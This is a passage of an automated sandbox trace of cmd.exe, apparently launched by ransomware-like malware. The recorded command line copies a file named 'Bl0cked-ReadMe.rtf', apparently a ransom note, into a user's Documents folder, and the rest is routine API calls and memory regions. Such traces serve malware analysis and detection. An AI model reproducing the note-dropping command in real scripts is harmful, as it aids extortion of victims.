CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.929] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.929] exit (_Code=0) Process: id = "168" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16bc0" os_pid = "0xe08" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT 
AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14842 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14843 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14844 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14845 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 14846 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14847 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14848 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14849 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14850 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 14851 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15666 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000010000" filename = "" Region: id = 15667 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15668 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15669 start_va = 0x480000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 15670 start_va = 0x720000 end_va = 0x72ffff entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 15671 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15672 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15673 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15674 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15675 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15676 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" 
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15677 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15678 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15679 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15680 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 15681 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15682 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15683 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 15684 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 15685 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 15686 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 15687 start_va = 0x2f0000 end_va = 0x3f0fff entry_point = 0x0 region_type 
= pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 15688 start_va = 0x580000 end_va = 0x6e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 15689 start_va = 0x730000 end_va = 0x132ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000730000" filename = "" Thread: id = 225 os_tid = 0xf5c [0140.406] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efdc4 | out: lpSystemTimeAsFileTime=0x2efdc4*(dwLowDateTime=0x8d9e8d40, dwHighDateTime=0x1d440a9)) [0140.406] GetCurrentProcessId () returned 0xe08 [0140.406] GetCurrentThreadId () returned 0xf5c [0140.406] GetTickCount () returned 0x2c15b [0140.406] QueryPerformanceCounter (in: lpPerformanceCount=0x2efdbc | out: lpPerformanceCount=0x2efdbc*=19719532125) returned 1 [0140.407] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0140.407] __set_app_type (_Type=0x1) [0140.407] __p__fmode () returned 0x76b331f4 [0140.407] __p__commode () returned 0x76b331fc [0140.407] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0140.407] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0140.407] GetCurrentThreadId () returned 0xf5c [0140.407] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf5c) returned 0x38 [0140.407] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.408] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0140.408] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.408] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.408] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, 
phkResult=0x2efd54 | out: phkResult=0x2efd54*=0x0) returned 0x2 [0140.408] VirtualQuery (in: lpAddress=0x2efd8b, lpBuffer=0x2efd24, dwLength=0x1c | out: lpBuffer=0x2efd24*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.408] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2efd24, dwLength=0x1c | out: lpBuffer=0x2efd24*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0140.408] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2efd24, dwLength=0x1c | out: lpBuffer=0x2efd24*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0140.408] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2efd24, dwLength=0x1c | out: lpBuffer=0x2efd24*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.408] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2efd24, dwLength=0x1c | out: lpBuffer=0x2efd24*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0140.408] GetConsoleOutputCP () returned 0x1b5 [0140.408] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.408] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0140.408] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.408] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0140.409] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.409] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.409] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.409] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.409] _get_osfhandle 
(_FileHandle=0) returned 0x3 [0140.409] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.409] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.409] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0140.410] GetEnvironmentStringsW () returned 0x490188* [0140.410] FreeEnvironmentStringsW (penv=0x490188) returned 1 [0140.410] GetEnvironmentStringsW () returned 0x490188* [0140.410] FreeEnvironmentStringsW (penv=0x490188) returned 1 [0140.410] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eecc4 | out: phkResult=0x2eecc4*=0x40) returned 0x0 [0140.410] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eeccc, lpData=0x2eecd0, lpcbData=0x2eecc8*=0x1000 | out: lpType=0x2eeccc*=0x0, lpData=0x2eecd0*=0xb0, lpcbData=0x2eecc8*=0x1000) returned 0x2 [0140.410] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eeccc, lpData=0x2eecd0, lpcbData=0x2eecc8*=0x1000 | out: lpType=0x2eeccc*=0x4, lpData=0x2eecd0*=0x1, lpcbData=0x2eecc8*=0x4) returned 0x0 [0140.410] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eeccc, lpData=0x2eecd0, lpcbData=0x2eecc8*=0x1000 | out: lpType=0x2eeccc*=0x0, lpData=0x2eecd0*=0x1, lpcbData=0x2eecc8*=0x1000) returned 0x2 [0140.410] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eeccc, lpData=0x2eecd0, lpcbData=0x2eecc8*=0x1000 | out: lpType=0x2eeccc*=0x4, lpData=0x2eecd0*=0x0, lpcbData=0x2eecc8*=0x4) returned 0x0 [0140.410] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eeccc, lpData=0x2eecd0, lpcbData=0x2eecc8*=0x1000 | out: lpType=0x2eeccc*=0x4, lpData=0x2eecd0*=0x40, lpcbData=0x2eecc8*=0x4) returned 0x0 [0140.410] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, 
lpType=0x2eeccc, lpData=0x2eecd0, lpcbData=0x2eecc8*=0x1000 | out: lpType=0x2eeccc*=0x4, lpData=0x2eecd0*=0x40, lpcbData=0x2eecc8*=0x4) returned 0x0 [0140.410] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eeccc, lpData=0x2eecd0, lpcbData=0x2eecc8*=0x1000 | out: lpType=0x2eeccc*=0x0, lpData=0x2eecd0*=0x40, lpcbData=0x2eecc8*=0x1000) returned 0x2 [0140.411] RegCloseKey (hKey=0x40) returned 0x0 [0140.411] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eecc4 | out: phkResult=0x2eecc4*=0x40) returned 0x0 [0140.411] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eeccc, lpData=0x2eecd0, lpcbData=0x2eecc8*=0x1000 | out: lpType=0x2eeccc*=0x0, lpData=0x2eecd0*=0x40, lpcbData=0x2eecc8*=0x1000) returned 0x2 [0140.411] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eeccc, lpData=0x2eecd0, lpcbData=0x2eecc8*=0x1000 | out: lpType=0x2eeccc*=0x4, lpData=0x2eecd0*=0x1, lpcbData=0x2eecc8*=0x4) returned 0x0 [0140.411] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eeccc, lpData=0x2eecd0, lpcbData=0x2eecc8*=0x1000 | out: lpType=0x2eeccc*=0x0, lpData=0x2eecd0*=0x1, lpcbData=0x2eecc8*=0x1000) returned 0x2 [0140.411] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eeccc, lpData=0x2eecd0, lpcbData=0x2eecc8*=0x1000 | out: lpType=0x2eeccc*=0x4, lpData=0x2eecd0*=0x0, lpcbData=0x2eecc8*=0x4) returned 0x0 [0140.411] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eeccc, lpData=0x2eecd0, lpcbData=0x2eecc8*=0x1000 | out: lpType=0x2eeccc*=0x4, lpData=0x2eecd0*=0x9, lpcbData=0x2eecc8*=0x4) returned 0x0 [0140.411] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eeccc, lpData=0x2eecd0, lpcbData=0x2eecc8*=0x1000 | out: 
lpType=0x2eeccc*=0x4, lpData=0x2eecd0*=0x9, lpcbData=0x2eecc8*=0x4) returned 0x0 [0140.411] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eeccc, lpData=0x2eecd0, lpcbData=0x2eecc8*=0x1000 | out: lpType=0x2eeccc*=0x0, lpData=0x2eecd0*=0x9, lpcbData=0x2eecc8*=0x1000) returned 0x2 [0140.411] RegCloseKey (hKey=0x40) returned 0x0 [0140.411] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636f [0140.411] srand (_Seed=0x5b88636f) [0140.411] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf\"" [0140.411] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf\"" [0140.411] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.412] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4918e8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0140.412] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0140.412] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.412] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.412] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0140.412] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0140.412] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0140.412] _wcsicmp 
(_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0140.412] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0140.412] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0140.412] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0140.412] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0140.412] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0140.412] GetEnvironmentStringsW () returned 0x4922d8* [0140.412] FreeEnvironmentStringsW (penv=0x4922d8) returned 1 [0140.412] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.412] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.412] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0140.412] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0140.412] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0140.413] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0140.413] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0140.413] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0140.413] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0140.413] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0140.413] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2efa90 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.413] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2efa90, lpFilePart=0x2efa8c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2efa8c*="Desktop") returned 0x18 [0140.413] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.413] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef80c | out: lpFindFileData=0x2ef80c) 
returned 0x490018 [0140.413] FindClose (in: hFindFile=0x490018 | out: hFindFile=0x490018) returned 1 [0140.413] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef80c | out: lpFindFileData=0x2ef80c) returned 0x490018 [0140.413] FindClose (in: hFindFile=0x490018 | out: hFindFile=0x490018) returned 1 [0140.413] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef80c | out: lpFindFileData=0x2ef80c) returned 0x490018 [0140.414] FindClose (in: hFindFile=0x490018 | out: hFindFile=0x490018) returned 1 [0140.414] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.414] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0140.414] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0140.414] GetEnvironmentStringsW () returned 0x492af8* [0140.414] FreeEnvironmentStringsW (penv=0x492af8) returned 1 [0140.414] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.415] GetConsoleOutputCP () returned 0x1b5 [0140.415] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.415] GetUserDefaultLCID () returned 0x409 [0140.415] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0140.415] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2efbd0, cchData=128 | out: lpLCData="0") returned 2 [0140.415] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2efbd0, cchData=128 | out: lpLCData="0") returned 2 [0140.415] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2efbd0, cchData=128 | out: lpLCData="1") returned 2 [0140.415] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0140.415] GetLocaleInfoW 
(in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0140.416] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0140.416] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0140.416] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0140.416] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0140.416] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0140.416] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0140.416] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0140.416] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0140.416] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0140.417] GetConsoleTitleW (in: lpConsoleTitle=0x4808e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.417] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.417] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0140.417] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0140.417] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0140.418] _wcsicmp (_String1="type", _String2=")") returned 75 [0140.418] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0140.418] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0140.418] _wcsicmp (_String1="IF", _String2="type") returned -11 [0140.418] _wcsicmp (_String1="IF/?", 
_String2="type") returned -11 [0140.418] _wcsicmp (_String1="REM", _String2="type") returned -2 [0140.418] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0140.423] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.423] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.423] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.423] GetFileType (hFile=0x7) returned 0x2 [0140.930] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0140.930] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2efac8 | out: lpMode=0x2efac8) returned 1 [0140.930] _dup (_FileHandle=1) returned 3 [0140.930] _close (_FileHandle=1) returned 0 [0140.930] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0140.930] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2efa98, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0140.931] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0140.931] GetConsoleTitleW (in: lpConsoleTitle=0x2ef8c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.932] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0140.932] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0140.932] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0140.932] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0140.932] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.933] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x2ef42c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef42c) returned 0x480e78 [0140.933] _wcsicmp (_String1="BL0CKE~1.RTF", 
_String2=".") returned 52 [0140.933] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0140.933] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0140.933] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ee338, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0140.933] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0140.933] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.933] GetFileType (hFile=0x54) returned 0x1 [0140.933] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.933] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x2ee390 | out: lpFileSizeHigh=0x2ee390*=0x0) returned 0x1632 [0140.933] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.933] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.933] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.933] ReadFile (in: 